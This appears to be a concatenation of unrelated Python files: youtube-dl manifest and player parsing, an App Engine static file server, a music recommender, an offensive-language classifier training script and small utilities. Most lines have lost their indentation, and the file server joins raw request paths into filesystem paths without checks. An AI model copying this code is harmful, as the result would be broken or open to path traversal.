segment_url = media_template % {
'Time': segment_time,
'Bandwidth': bandwidth,
'Number': segment_number,
}
representation_ms_info['fragments'].append({
'url': segment_url,
'duration': float_or_none(segment_d, representation_ms_info['timescale']),
})
for num, s in enumerate(representation_ms_info['s']):
segment_time = s.get('t') or segment_time
segment_d = s['d']
add_segment_url()
segment_number += 1
for r in range(s.get('r', 0)):
segment_time += segment_d
add_segment_url()
segment_number += 1
segment_time += segment_d
elif 'segment_urls' in representation_ms_info and 's' in representation_ms_info:
# No media template
# Example: https://www.youtube.com/watch?v=iXZV5uAYMJI
# or any YouTube dashsegments video
fragments = []
segment_index = 0
timescale = representation_ms_info['timescale']
for s in representation_ms_info['s']:
duration = float_or_none(s['d'], timescale)
for r in range(s.get('r', 0) + 1):
fragments.append({
'url': representation_ms_info['segment_urls'][segment_index],
'duration': duration,
})
segment_index += 1
representation_ms_info['fragments'] = fragments
# NB: MPD manifest may contain direct URLs to unfragmented media.
# No fragments key is present in this case.
if 'fragments' in representation_ms_info:
f.update({
'fragments': [],
'protocol': 'http_dash_segments',
})
if 'initialization_url' in representation_ms_info:
initialization_url = representation_ms_info['initialization_url']
if not f.get('url'):
f['url'] = initialization_url
f['fragments'].append({'url': initialization_url})
f['fragments'].extend(representation_ms_info['fragments'])
for fragment in f['fragments']:
fragment['url'] = urljoin(base_url, fragment['url'])
try:
existing_format = next(
fo for fo in formats
if fo['format_id'] == representation_id)
except StopIteration:
full_info = formats_dict.get(representation_id, {}).copy()
full_info.update(f)
formats.append(full_info)
else:
existing_format.update(f)
else:
self.report_warning('Unknown MIME type %s in DASH manifest' % mime_type)
return formats
def _extract_ism_formats(self, ism_url, video_id, ism_id=None, note=None, errnote=None, fatal=True):
res = self._download_webpage_handle(
ism_url, video_id,
note=note or 'Downloading ISM manifest',
errnote=errnote or 'Failed to download ISM manifest',
fatal=fatal)
if res is False:
return []
ism, urlh = res
return self._parse_ism_formats(
compat_etree_fromstring(ism.encode('utf-8')), urlh.geturl(), ism_id)
def _parse_ism_formats(self, ism_doc, ism_url, ism_id=None):
if ism_doc.get('IsLive') == 'TRUE' or ism_doc.find('Protection') is not None:
return []
duration = int(ism_doc.attrib['Duration'])
timescale = int_or_none(ism_doc.get('TimeScale')) or 10000000
formats = []
for stream in ism_doc.findall('StreamIndex'):
stream_type = stream.get('Type')
if stream_type not in ('video', 'audio'):
continue
url_pattern = stream.attrib['Url']
stream_timescale = int_or_none(stream.get('TimeScale')) or timescale
stream_name = stream.get('Name')
for track in stream.findall('QualityLevel'):
fourcc = track.get('FourCC')
# TODO: add support for WVC1 and WMAP
if fourcc not in ('H264', 'AVC1', 'AACL'):
self.report_warning('%s is not a supported codec' % fourcc)
continue
tbr = int(track.attrib['Bitrate']) // 1000
width = int_or_none(track.get('MaxWidth'))
height = int_or_none(track.get('MaxHeight'))
sampling_rate = int_or_none(track.get('SamplingRate'))
track_url_pattern = re.sub(r'{[Bb]itrate}', track.attrib['Bitrate'], url_pattern)
track_url_pattern = compat_urlparse.urljoin(ism_url, track_url_pattern)
fragments = []
fragment_ctx = {
'time': 0,
}
stream_fragments = stream.findall('c')
for stream_fragment_index, stream_fragment in enumerate(stream_fragments):
fragment_ctx['time'] = int_or_none(stream_fragment.get('t')) or fragment_ctx['time']
fragment_repeat = int_or_none(stream_fragment.get('r')) or 1
fragment_ctx['duration'] = int_or_none(stream_fragment.get('d'))
if not fragment_ctx['duration']:
try:
                            next_fragment_time = int(stream_fragments[stream_fragment_index + 1].attrib['t'])
except IndexError:
next_fragment_time = duration
fragment_ctx['duration'] = (next_fragment_time - fragment_ctx['time']) / fragment_repeat
for _ in range(fragment_repeat):
fragments.append({
'url': re.sub(r'{start[ _]time}', compat_str(fragment_ctx['time']), track_url_pattern),
'duration': fragment_ctx['duration'] / stream_timescale,
})
fragment_ctx['time'] += fragment_ctx['duration']
format_id = []
if ism_id:
format_id.append(ism_id)
if stream_name:
format_id.append(stream_name)
format_id.append(compat_str(tbr))
formats.append({
'format_id': '-'.join(format_id),
'url': ism_url,
'manifest_url': ism_url,
'ext': 'ismv' if stream_type == 'video' else 'isma',
'width': width,
'height': height,
'tbr': tbr,
'asr': sampling_rate,
'vcodec': 'none' if stream_type == 'audio' else fourcc,
'acodec': 'none' if stream_type == 'video' else fourcc,
'protocol': 'ism',
'fragments': fragments,
'_download_params': {
'duration': duration,
'timescale': stream_timescale,
'width': width or 0,
'height': height or 0,
'fourcc': fourcc,
'codec_private_data': track.get('CodecPrivateData'),
'sampling_rate': sampling_rate,
'channels': int_or_none(track.get('Channels', 2)),
'bits_per_sample': int_or_none(track.get('BitsPerSample', 16)),
'nal_unit_length_field': int_or_none(track.get('NALUnitLengthField', 4)),
},
})
return formats
def _parse_html5_media_entries(self, base_url, webpage, video_id, m3u8_id=None, m3u8_entry_protocol='m3u8', mpd_id=None, preference=None):
def absolute_url(video_url):
return compat_urlparse.urljoin(base_url, video_url)
def parse_content_type(content_type):
if not content_type:
return {}
ctr = re.search(r'(?P<mimetype>[^/]+/[^;]+)(?:;\s*codecs="?(?P<codecs>[^"]+))?', content_type)
if ctr:
mimetype, codecs = ctr.groups()
f = parse_codecs(codecs)
f['ext'] = mimetype2ext(mimetype)
return f
return {}
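        # Illustrative example: parse_content_type('video/mp4; codecs="avc1.64001f, mp4a.40.2"')
        # yields roughly {'ext': 'mp4', 'vcodec': 'avc1.64001f', 'acodec': 'mp4a.40.2'}
        # (the exact codec keys depend on parse_codecs).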
def _media_formats(src, cur_media_type):
full_url = absolute_url(src)
ext = determine_ext(full_url)
if ext == 'm3u8':
is_plain_url = False
formats = self._extract_m3u8_formats(
full_url, video_id, ext='mp4',
entry_protocol=m3u8_entry_protocol, m3u8_id=m3u8_id,
preference=preference)
elif ext == 'mpd':
is_plain_url = False
formats = self._extract_mpd_formats(
full_url, video_id, mpd_id=mpd_id)
else:
is_plain_url = True
formats = [{
'url': full_url,
'vcodec': 'none' if cur_media_type == 'audio' else None,
}]
return is_plain_url, formats
entries = []
media_tags = [(media_tag, media_type, '')
for media_tag, media_type
in re.findall(r'(?s)(<(video|audio)[^>]*/>)', webpage)]
media_tags.extend(re.findall(
# We only allow video|audio followed by a whitespace or '>'.
# Allowing more characters may end up in significant slow down (see
# https://github.com/rg3/youtube-dl/issues/11979, example URL:
# http://www.porntrex.com/maps/videositemap.xml).
r'(?s)(<(?P<tag>video|audio)(?:\s+[^>]*)?>)(.*?)</(?P=tag)>', webpage))
for media_tag, media_type, media_content in media_tags:
media_info = {
'formats': [],
'subtitles': {},
}
media_attributes = extract_attributes(media_tag)
src = media_attributes.get('src')
if src:
_, formats = _media_formats(src, media_type)
media_info['formats'].extend(formats)
media_info['thumbnail'] = media_attributes.get('poster')
if media_content:
for source_tag in re.findall(r'<source[^>]+>', media_content):
source_attributes = extract_attributes(source_tag)
src = source_attributes.get('src')
if not src:
continue
is_plain_url, formats = _media_formats(src, media_type)
if is_plain_url:
f = parse_content_type(source_attributes.get('type'))
f.update(formats[0])
media_info['formats'].append(f)
else:
media_info['formats'].extend(formats)
for track_tag in re.findall(r'<track[^>]+>', media_content):
track_attributes = extract_attributes(track_tag)
kind = track_attributes.get('kind')
if not kind or kind in ('subtitles', 'captions'):
src = track_attributes.get('src')
if not src:
continue
lang = track_attributes.get('srclang') or track_attributes.get('lang') or track_attributes.get('label')
media_info['subtitles'].setdefault(lang, []).append({
'url': absolute_url(src),
})
if media_info['formats'] or media_info['subtitles']:
entries.append(media_info)
return entries
def _extract_akamai_formats(self, manifest_url, video_id, hosts={}):
formats = []
hdcore_sign = 'hdcore=3.7.0'
        f4m_url = re.sub(r'(https?://[^/]+)/i/', r'\1/z/', manifest_url).replace('/master.m3u8', '/manifest.f4m')
hds_host = hosts.get('hds')
if hds_host:
f4m_url = re.sub(r'(https?://)[^/]+', r'\1' + hds_host, f4m_url)
if 'hdcore=' not in f4m_url:
f4m_url += ('&' if '?' in f4m_url else '?') + hdcore_sign
f4m_formats = self._extract_f4m_formats(
f4m_url, video_id, f4m_id='hds', fatal=False)
for entry in f4m_formats:
entry.update({'extra_param_to_segment_url': hdcore_sign})
formats.extend(f4m_formats)
m3u8_url = re.sub(r'(https?://[^/]+)/z/', r'\1/i/', manifest_url).replace('/manifest.f4m', '/master.m3u8')
hls_host = hosts.get('hls')
if hls_host:
m3u8_url = re.sub(r'(https?://)[^/]+', r'\1' + hls_host, m3u8_url)
formats.extend(self._extract_m3u8_formats(
m3u8_url, video_id, 'mp4', 'm3u8_native',
m3u8_id='hls', fatal=False))
return formats
def _extract_wowza_formats(self, url, video_id, m3u8_entry_protocol='m3u8_native', skip_protocols=[]):
url = re.sub(r'/(?:manifest|playlist|jwplayer)\.(?:m3u8|f4m|mpd|smil)', '', url)
url_base = self._search_regex(r'(?:https?|rtmp|rtsp)(://[^?]+)', url, 'format url')
http_base_url = 'http' + url_base
formats = []
if 'm3u8' not in skip_protocols:
formats.extend(self._extract_m3u8_formats(
http_base_url + '/playlist.m3u8', video_id, 'mp4',
m3u8_entry_protocol, m3u8_id='hls', fatal=False))
if 'f4m' not in skip_protocols:
formats.extend(self._extract_f4m_formats(
http_base_url + '/manifest.f4m',
video_id, f4m_id='hds', fatal=False))
if 'dash' not in skip_protocols:
formats.extend(self._extract_mpd_formats(
http_base_url + '/manifest.mpd',
video_id, mpd_id='dash', fatal=False))
if re.search(r'(?:/smil:|\.smil)', url_base):
if 'smil' not in skip_protocols:
rtmp_formats = self._extract_smil_formats(
http_base_url + '/jwplayer.smil',
video_id, fatal=False)
for rtmp_format in rtmp_formats:
rtsp_format = rtmp_format.copy()
rtsp_format['url'] = '%s/%s' % (rtmp_format['url'], rtmp_format['play_path'])
del rtsp_format['play_path']
del rtsp_format['ext']
rtsp_format.update({
'url': rtsp_format['url'].replace('rtmp://', 'rtsp://'),
'format_id': rtmp_format['format_id'].replace('rtmp', 'rtsp'),
'protocol': 'rtsp',
})
formats.extend([rtmp_format, rtsp_format])
else:
for protocol in ('rtmp', 'rtsp'):
if protocol not in skip_protocols:
formats.append({
'url': protocol + url_base,
'format_id': protocol,
'protocol': protocol,
})
return formats
@staticmethod
def _find_jwplayer_data(webpage):
mobj = re.search(
r'jwplayer\((?P<quote>[\'"])[^\'" ]+(?P=quote)\)\.setup\s*\((?P<options>[^)]+)\)',
webpage)
if mobj:
return mobj.group('options')
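    # Illustrative match (not from any real page): for markup such as
    #   jwplayer("player").setup({"file": "http://example.com/v.mp4"})
    # this returns the raw options string '{"file": "http://example.com/v.mp4"}'.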
def _extract_jwplayer_data(self, webpage, video_id, *args, **kwargs):
jwplayer_data = self._parse_json(
self._find_jwplayer_data(webpage), video_id,
transform_source=js_to_json)
return self._parse_jwplayer_data(
jwplayer_data, video_id, *args, **kwargs)
def _parse_jwplayer_data(self, jwplayer_data, video_id=None, require_title=True,
m3u8_id=None, mpd_id=None, rtmp_params=None, base_url=None):
# JWPlayer backward compatibility: flattened playlists
# https://github.com/jwplayer/jwplayer/blob/v7.4.3/src/js/api/config.js#L81-L96
if 'playlist' not in jwplayer_data:
jwplayer_data = {'playlist': [jwplayer_data]}
entries = []
# JWPlayer backward compatibility: single playlist item
# https://github.com/jwplayer/jwplayer/blob/v7.7.0/src/js/playlist/playlist.js#L10
if not isinstance(jwplayer_data['playlist'], list):
jwplayer_data['playlist'] = [jwplayer_data['playlist']]
for video_data in jwplayer_data['playlist']:
# JWPlayer backward compatibility: flattened sources
# https://github.com/jwplayer/jwplayer/blob/v7.4.3/src/js/playlist/item.js#L29-L35
if 'sources' not in video_data:
video_data['sources'] = [video_data]
this_video_id = video_id or video_data['mediaid']
formats = []
for source in video_data['sources']:
source_url = self._proto_relative_url(source['file'])
if base_url:
source_url = compat_urlparse.urljoin(base_url, source_url)
source_type = source.get('type') or ''
ext = mimetype2ext(source_type) or determine_ext(source_url)
if source_type == 'hls' or ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
source_url, this_video_id, 'mp4', 'm3u8_native', m3u8_id=m3u8_id, fatal=False))
elif ext == 'mpd':
formats.extend(self._extract_mpd_formats(
source_url, this_video_id, mpd_id=mpd_id, fatal=False))
# https://github.com/jwplayer/jwplayer/blob/master/src/js/providers/default.js#L67
elif source_type.startswith('audio') or ext in ('oga', 'aac', 'mp3', 'mpeg', 'vorbis'):
formats.append({
'url': source_url,
'vcodec': 'none',
'ext': ext,
})
else:
height = int_or_none(source.get('height'))
if height is None:
# Often no height is provided but there is a label in
# format like 1080p.
height = int_or_none(self._search_regex(
r'^(\d{3,})[pP]$', source.get('label') or '',
'height', default=None))
a_format = {
'url': source_url,
'width': int_or_none(source.get('width')),
'height': height,
'ext': ext,
}
if source_url.startswith('rtmp'):
a_format['ext'] = 'flv'
# See com/longtailvideo/jwplayer/media/RTMPMediaProvider.as
# of jwplayer.flash.swf
rtmp_url_parts = re.split(
r'((?:mp4|mp3|flv):)', source_url, 1)
if len(rtmp_url_parts) == 3:
rtmp_url, prefix, play_path = rtmp_url_parts
a_format.update({
'url': rtmp_url,
'play_path': prefix + play_path,
})
if rtmp_params:
a_format.update(rtmp_params)
formats.append(a_format)
self._sort_formats(formats)
subtitles = {}
tracks = video_data.get('tracks')
if tracks and isinstance(tracks, list):
for track in tracks:
if track.get('kind') != 'captions':
continue
track_url = urljoin(base_url, track.get('file'))
if not track_url:
continue
subtitles.setdefault(track.get('label') or 'en', []).append({
'url': self._proto_relative_url(track_url)
})
entries.append({
'id': this_video_id,
'title': video_data['title'] if require_title else video_data.get('title'),
'description': video_data.get('description'),
'thumbnail': self._proto_relative_url(video_data.get('image')),
'timestamp': int_or_none(video_data.get('pubdate')),
'duration': float_or_none(jwplayer_data.get('duration') or video_data.get('duration')),
'subtitles': subtitles,
'formats': formats,
})
if len(entries) == 1:
return entries[0]
else:
return self.playlist_result(entries)
def _live_title(self, name):
""" Generate the title for a live video """
now = datetime.datetime.now()
now_str = now.strftime('%Y-%m-%d %H:%M')
return name + ' ' + now_str
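    # Example (illustrative): _live_title('News stream') -> 'News stream 2017-03-28 21:05',
    # where the suffix is the current local time.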
def _int(self, v, name, fatal=False, **kwargs):
res = int_or_none(v, **kwargs)
if res is None:
msg = 'Failed to extract %s: Could not parse value %r' % (name, v)
if fatal:
raise ExtractorError(msg)
else:
self._downloader.report_warning(msg)
return res
def _float(self, v, name, fatal=False, **kwargs):
res = float_or_none(v, **kwargs)
if res is None:
msg = 'Failed to extract %s: Could not parse value %r' % (name, v)
if fatal:
raise ExtractorError(msg)
else:
self._downloader.report_warning(msg)
return res
def _set_cookie(self, domain, name, value, expire_time=None):
cookie = compat_cookiejar.Cookie(
0, name, value, None, None, domain, None,
None, '/', True, False, expire_time, '', None, None, None)
self._downloader.cookiejar.set_cookie(cookie)
def _get_cookies(self, url):
""" Return a compat_cookies.SimpleCookie with the cookies for the url """
req = sanitized_Request(url)
self._downloader.cookiejar.add_cookie_header(req)
return compat_cookies.SimpleCookie(req.get_header('Cookie'))
def get_testcases(self, include_onlymatching=False):
t = getattr(self, '_TEST', None)
if t:
assert not hasattr(self, '_TESTS'), \
'%s has _TEST and _TESTS' % type(self).__name__
tests = [t]
else:
tests = getattr(self, '_TESTS', [])
for t in tests:
if not include_onlymatching and t.get('only_matching', False):
continue
t['name'] = type(self).__name__[:-len('IE')]
yield t
def is_suitable(self, age_limit):
""" Test whether the extractor is generally suitable for the given
age limit (i.e. pornographic sites are not, all others usually are) """
any_restricted = False
for tc in self.get_testcases(include_onlymatching=False):
if tc.get('playlist', []):
tc = tc['playlist'][0]
is_restricted = age_restricted(
tc.get('info_dict', {}).get('age_limit'), age_limit)
if not is_restricted:
return True
any_restricted = any_restricted or is_restricted
return not any_restricted
def extract_subtitles(self, *args, **kwargs):
if (self._downloader.params.get('writesubtitles', False) or
self._downloader.params.get('listsubtitles')):
return self._get_subtitles(*args, **kwargs)
return {}
def _get_subtitles(self, *args, **kwargs):
raise NotImplementedError('This method must be implemented by subclasses')
@staticmethod
def _merge_subtitle_items(subtitle_list1, subtitle_list2):
""" Merge subtitle items for one language. Items with duplicated URLs
will be dropped. """
list1_urls = set([item['url'] for item in subtitle_list1])
ret = list(subtitle_list1)
ret.extend([item for item in subtitle_list2 if item['url'] not in list1_urls])
return ret
@classmethod
def _merge_subtitles(cls, subtitle_dict1, subtitle_dict2):
""" Merge two subtitle dictionaries, language by language. """
ret = dict(subtitle_dict1)
for lang in subtitle_dict2:
ret[lang] = cls._merge_subtitle_items(subtitle_dict1.get(lang, []), subtitle_dict2[lang])
return ret
def extract_automatic_captions(self, *args, **kwargs):
if (self._downloader.params.get('writeautomaticsub', False) or
self._downloader.params.get('listsubtitles')):
return self._get_automatic_captions(*args, **kwargs)
return {}
def _get_automatic_captions(self, *args, **kwargs):
raise NotImplementedError('This method must be implemented by subclasses')
def mark_watched(self, *args, **kwargs):
if (self._downloader.params.get('mark_watched', False) and
(self._get_login_info()[0] is not None or
self._downloader.params.get('cookiefile') is not None)):
self._mark_watched(*args, **kwargs)
def _mark_watched(self, *args, **kwargs):
raise NotImplementedError('This method must be implemented by subclasses')
def geo_verification_headers(self):
headers = {}
geo_verification_proxy = self._downloader.params.get('geo_verification_proxy')
if geo_verification_proxy:
headers['Ytdl-request-proxy'] = geo_verification_proxy
return headers
def _generic_id(self, url):
return compat_urllib_parse_unquote(os.path.splitext(url.rstrip('/').split('/')[-1])[0])
def _generic_title(self, url):
return compat_urllib_parse_unquote(os.path.splitext(url_basename(url))[0])
class SearchInfoExtractor(InfoExtractor):
"""
Base class for paged search queries extractors.
They accept URLs in the format _SEARCH_KEY(|all|[0-9]):{query}
Instances should define _SEARCH_KEY and _MAX_RESULTS.
"""
@classmethod
def _make_valid_url(cls):
return r'%s(?P<prefix>|[1-9][0-9]*|all):(?P<query>[\s\S]+)' % cls._SEARCH_KEY
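    # Example (illustrative): with _SEARCH_KEY = 'ytsearch' the pattern matches
    # 'ytsearch:cats' (1 result), 'ytsearch5:cats' (5 results) and
    # 'ytsearchall:cats' (up to _MAX_RESULTS results).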
@classmethod
def suitable(cls, url):
return re.match(cls._make_valid_url(), url) is not None
def _real_extract(self, query):
mobj = re.match(self._make_valid_url(), query)
if mobj is None:
raise ExtractorError('Invalid search query "%s"' % query)
prefix = mobj.group('prefix')
query = mobj.group('query')
if prefix == '':
return self._get_n_results(query, 1)
elif prefix == 'all':
return self._get_n_results(query, self._MAX_RESULTS)
else:
n = int(prefix)
if n <= 0:
raise ExtractorError('invalid download number %s for query "%s"' % (n, query))
elif n > self._MAX_RESULTS:
self._downloader.report_warning('%s returns max %i results (you requested %i)' % (self._SEARCH_KEY, self._MAX_RESULTS, n))
n = self._MAX_RESULTS
return self._get_n_results(query, n)
def _get_n_results(self, query, n):
"""Get a specified number of results for a query"""
raise NotImplementedError('This method must be implemented by subclasses')
@property
def SEARCH_KEY(self):
return self._SEARCH_KEY
# ---- File: main.py (repo: NoxHarmonium/multi-domain-appengine, no license) ----
#
# Main Handler File
#
# Python imports
import os
import webapp2
from webapp2_extras import routes
from google.appengine.ext.webapp import template
import mimetypes
import logging
import time
from datetime import date
from datetime import timedelta
# User code imports
import utils
# Constants
subpath = 'html'
cache_control = 'Public, max-age=31536000'
expire_length = timedelta(days=365)
class MainHandler(webapp2.RequestHandler):
    def get(self, path):
# Initialise the mime type utility
if not(mimetypes.inited):
mimetypes.init()
# No path defaults to home page
if path is None or path == '/' or path == '':
path = 'index.html'
# Get the file location on the server
        path = os.path.join(os.path.dirname(__file__), self.request.route.name, subpath, path)
# Set response headers
        self.response.headers['Content-Type'] = mimetypes.guess_type(path)[0]
        self.response.headers['Cache-Control'] = cache_control
        # formatDate and parseDate are assumed to be provided by the local
        # utils module imported above.
        self.response.headers['Expires'] = formatDate(date.today() + expire_length)
lastUpdateTime = None
        # If there is an 'If-Modified-Since' header, use it to see if
        # the file has changed since the client last downloaded it.
        try:
            lastUpdateTime = self.request.headers['If-Modified-Since']
        except KeyError:
            pass
        if not (lastUpdateTime is None or lastUpdateTime == ''):
            lastUpdateTime = parseDate(lastUpdateTime)
            fileModTime = os.stat(path).st_mtime
            if lastUpdateTime >= fileModTime:
                # Status code 304 means the file hasn't changed (send no data)
                self.response.set_status(304)
                return
        # Read the server file
        out = open(path, 'rb').read()
        # Write the server file out to the client
        self.response.out.write(out)
app = webapp2.WSGIApplication([
routes.DomainRoute('www.exampledomain1.com', [
webapp2.Route('/<path:.*?>', handler=MainHandler, name='www.exampledomain1.com'),
]),
routes.DomainRoute('www.exampledomain2.com', [
webapp2.Route('/<path:.*?>', handler=MainHandler, name='www.exampledomain2.com'),
]),
# localhost defaults to first domain
routes.DomainRoute('localhost', [
webapp2.Route('/<path:.*?>', handler=MainHandler, name='www.exampledomain1.com'),
])
], debug=True)
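# To serve an additional domain (illustrative sketch; the domain name is a
# placeholder), append another DomainRoute before the localhost fallback:
#   routes.DomainRoute('www.exampledomain3.com', [
#       webapp2.Route('/<path:.*?>', handler=MainHandler, name='www.exampledomain3.com'),
#   ])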
# ---- File: music/truncate(1).py (repo: abhilekh703/Music-Recommendation, no license) ----
from numpy import genfromtxt
import numpy as np
original_filename = "train_triples.txt"
trunc_filename = "truncated_data.txt"
def similarity(u,v):
# print "Calculating sim between " + str(u) + " and " + str(v),
numerator = float(np.inner(u,v))
norm_u = np.linalg.norm(u)
norm_v = np.linalg.norm(v)
denominator = norm_u * norm_v
# print numerator, denominator
# print " = " + str(numerator/denominator)
return numerator/denominator
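# Illustrative check (not in the original script): parallel vectors score 1.0,
#   similarity(np.array([1, 2]), np.array([2, 4])) -> 1.0
# while orthogonal vectors such as [1, 0] and [0, 1] score 0.0.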
def score(user_index,song_index,data):
u = data[user_index]
u_avg = np.mean(u)
numerator = 0
denominator = 0
# print 'similarity = '
for u1 in data:
u1_avg = np.mean(u1)
sim = similarity(u,u1)
# print sim,
numerator += sim * (u[song_index]-u1_avg)
denominator += abs(sim)
return u_avg + (numerator/denominator)
def prediction(user_index,data,k=16):
score_list = []
print "Constructing score list...",
for i in xrange(data.shape[1]):
s = score(user_index, i, data)
score_list.append((s, i))
score_list.sort()
print "Done"
recommendations = score_list[data.shape[1]-k:data.shape[1]]
rec_songs = [y for (x,y) in recommendations]
# print score_list
return rec_songs
def normalizeMatrix(data_matrix):
num_rows = data_matrix.shape[0]
    num_cols = data_matrix.shape[1]
    data_matrix_normalized = [[0] * num_cols] * num_rows
    # Normalizing the data
for i in xrange(num_rows):
data_matrix_normalized[i] = data_matrix[i] / float(np.amax(data_matrix[i]))
return np.asarray(data_matrix_normalized)
if __name__ == '__main__':
data = genfromtxt("newmatrix.csv",delimiter=",")
num_users = data.shape[0]
data_normal = normalizeMatrix(data)
    u = 0  # index of the user to recommend for (example value; adjust as needed)
print prediction(u,data_normal)
print num_users
print data.shape[1]
#user_music = genfromtxt('matrix.csv', delimiter=',')
#print user_music
# ---- File: ProgramaHBSIS/Cadastro.py (repo: JuniorCardoso-py/PythonCourse, no license) ----
def cadastro():
    n1 = input('\nEnter the desired option: ')
    return n1
# ---- File: examples/bengali/bengali_deepoffense.py (repo: prajwal2495/DeepOffense, no license) ----
import os
import shutil
import time
import csv
import numpy as np
import pandas as pd
import sklearn
import torch
from sklearn.model_selection import train_test_split
from deepoffense.classification import ClassificationModel
from deepoffense.language_modeling.language_modeling_model import LanguageModelingModel
from examples.common.evaluation import macro_f1, weighted_f1
from examples.common.label_converter import decode, encode
from examples.bengali.bengali_deepoffense_config import LANGUAGE_FINETUNE, TEMP_DIRECTORY, SUBMISSION_FOLDER, \
MODEL_TYPE, MODEL_NAME, language_modeling_args, args, SEED, RESULT_FILE
from examples.common.print_stat import print_information, print_information_multi_class
if not os.path.exists(TEMP_DIRECTORY): os.makedirs(TEMP_DIRECTORY)
if not os.path.exists(os.path.join(TEMP_DIRECTORY, SUBMISSION_FOLDER)): os.makedirs(
os.path.join(TEMP_DIRECTORY, SUBMISSION_FOLDER))
train = pd.read_csv('examples/bengali/data/trac2_iben_train.csv', sep=",", encoding="utf-8-sig", engine="python")
train = train.rename(columns={'Text': 'text', 'Sub-task A': 'labels'}).dropna()
train = train[['text', 'labels']]
dev = pd.read_csv('examples/bengali/data/trac2_iben_dev.csv', sep=",", encoding="utf-8-sig", engine="python")
dev = dev.rename(columns={'Text': 'text', 'Sub-task A': 'labels'}).dropna()
dev = dev[['text', 'labels']]
test = pd.read_csv('examples/bengali/data/trac2_iben_test.csv', sep=",", encoding="utf-8-sig", engine="python")
test = test.rename(columns={'Text': 'text', 'Sub-task A': 'labels'}).dropna()
test = test[['text', 'labels']]
train = pd.concat([train, dev])
if LANGUAGE_FINETUNE:
train_list = train['text'].tolist()
test_list = test['text'].tolist()
complete_list = train_list + test_list
lm_train = complete_list[0: int(len(complete_list)*0.8)]
lm_test = complete_list[-int(len(complete_list)*0.2):]
with open(os.path.join(TEMP_DIRECTORY, "lm_train.txt"), 'w') as f:
for item in lm_train:
f.write("%s\n" % item)
with open(os.path.join(TEMP_DIRECTORY, "lm_test.txt"), 'w') as f:
for item in lm_test:
f.write("%s\n" % item)
model = LanguageModelingModel(MODEL_TYPE, MODEL_NAME, args=language_modeling_args)
model.train_model(os.path.join(TEMP_DIRECTORY, "lm_train.txt"), eval_file=os.path.join(TEMP_DIRECTORY, "lm_test.txt"))
MODEL_NAME = language_modeling_args["best_model_dir"]
# Train the model
print("Started Training")
train['labels'] = encode(train["labels"])
test['labels'] = encode(test["labels"])
test_sentences = test['text'].tolist()
test_preds = np.zeros((len(test), args["n_fold"]))
if args["evaluate_during_training"]:
for i in range(args["n_fold"]):
if os.path.exists(args['output_dir']) and os.path.isdir(args['output_dir']):
shutil.rmtree(args['output_dir'])
print("Started Fold {}".format(i))
model = ClassificationModel(MODEL_TYPE, MODEL_NAME, args=args, num_labels=3,
use_cuda=torch.cuda.is_available()) # You can set class weights by using the optional weight argument
train_df, eval_df = train_test_split(train, test_size=0.1, random_state=SEED * i)
model.train_model(train_df, eval_df=eval_df, macro_f1=macro_f1, weighted_f1=weighted_f1, accuracy=sklearn.metrics.accuracy_score)
model = ClassificationModel(MODEL_TYPE, args["best_model_dir"], args=args,
use_cuda=torch.cuda.is_available())
predictions, raw_outputs = model.predict(test_sentences)
test_preds[:, i] = predictions
print("Completed Fold {}".format(i))
# select majority class of each instance (row)
final_predictions = []
for row in test_preds:
row = row.tolist()
final_predictions.append(int(max(set(row), key=row.count)))
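    # e.g. fold predictions [0.0, 1.0, 1.0] for a row yield label 1; ties are
    # resolved arbitrarily by max() over the set (illustrative note).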
test['predictions'] = final_predictions
else:
model = ClassificationModel(MODEL_TYPE, MODEL_NAME, args=args, num_labels=3,
use_cuda=torch.cuda.is_available())
model.train_model(train, macro_f1=macro_f1, weighted_f1=weighted_f1, accuracy=sklearn.metrics.accuracy_score)
predictions, raw_outputs = model.predict(test_sentences)
test['predictions'] = predictions
test['predictions'] = decode(test['predictions'])
test['labels'] = decode(test['labels'])
time.sleep(5)
print_information_multi_class(test, "predictions", "labels")
test.to_csv(os.path.join(TEMP_DIRECTORY, RESULT_FILE), header=True, sep='\t', index=False, encoding='utf-8')
# ---- File: src/main/python/june-2017/read_select_classes.py (repo: STAMP-project/dspot-experiments, no license) ----
import sys
import json
def read(projects):
with open("dataset/selected_classes.json") as data_file:
classes = json.load(data_file)
top = []
worst = []
for project in projects:
top.append(classes[project]["top_1"])
top.append(classes[project]["top_2"])
worst.append(classes[project]["worst_1"])
worst.append(classes[project]["worst_2"])
return top, worst
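# Expected shape of dataset/selected_classes.json, inferred from the lookups
# above (illustrative):
#   {"javapoet": {"top_1": "...", "top_2": "...",
#                 "worst_1": "...", "worst_2": "..."}, ...}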
if __name__ == '__main__':
if len(sys.argv) > 1:
projects = sys.argv[1:]
else:
projects = ["javapoet", "mybatis", "traccar", "stream-lib", "mustache.java", "twilio-java", "jsoup",
"protostuff",
"logback", "retrofit"]
print read(projects=projects)
# ---- File: setup.py (repo: artiya4u/huntertray, MIT license) ----
import sys
from setuptools import setup
from setuptools import find_packages
requirements = ['requests']
if sys.version_info < (2, 7):
requirements.append('argparse')
setup(name='huntertray',
version='0.0.3',
description='ProductHunt in your System Tray',
long_description='ProductHunt in your System Tray inspired by HackerTray',
keywords='ProductHunt PH tray system tray icon huntertray',
url='https://github.com/artiya4u/huntertray',
author='Artiya Thinkumpang',
author_email='[email protected]',
license='MIT',
packages=find_packages(),
package_data={
'huntertray.data': ['hunter-tray.png']
},
install_requires=[
'requests>=2.2.1'
],
entry_points={
'console_scripts': ['huntertray = huntertray:main'],
},
zip_safe=False)